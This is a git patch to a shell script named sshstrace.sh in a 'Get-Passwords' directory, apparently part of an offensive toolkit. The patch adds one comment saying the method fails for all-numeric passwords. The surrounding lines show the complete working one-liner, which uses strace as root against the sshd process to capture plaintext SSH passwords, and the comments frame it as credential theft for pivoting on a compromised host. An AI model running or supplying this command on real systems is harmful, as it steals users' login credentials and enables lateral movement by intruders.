From b4e76815de6705a07d78d56b6a2ecc4f5f5173b0 Mon Sep 17 00:00:00 2001
From: dade <0xdade@users.noreply.github.com>
Date: Sat, 22 Jul 2017 20:34:08 -0700
Subject: [PATCH] Update sshstrace.sh

---
 Get-Passwords/sshstrace.sh | 1 +
 1 file changed, 1 insertion(+)

diff --git a/Get-Passwords/sshstrace.sh b/Get-Passwords/sshstrace.sh
index 317a572..fa846d9 100644
--- a/Get-Passwords/sshstrace.sh
+++ b/Get-Passwords/sshstrace.sh
@@ -3,6 +3,7 @@
 # In a facepalm revelation, it has come to my attention that you can use strace as root to collect passwords from sshd
 # Passwords are useful for pivoting and can be significantly faster than cracking /etc/shadow
 # I think I fixed the random char padding problem, but now perl is required
+# Turns out it also doesn't work if the password is entirely numbers.
 #
 
 strace -s 128 -fp `cat /var/run/sshd.pid` 2>&1 | grep --line-buffered -oP 'write\(4, "\\0\\0\\0\\[\d]*[^\\]{2,}[^\\0]"' | perl -pe 's/write\(4, "\\0\\0\\0\\([\d]+|[\w])(.*)"/\2/g'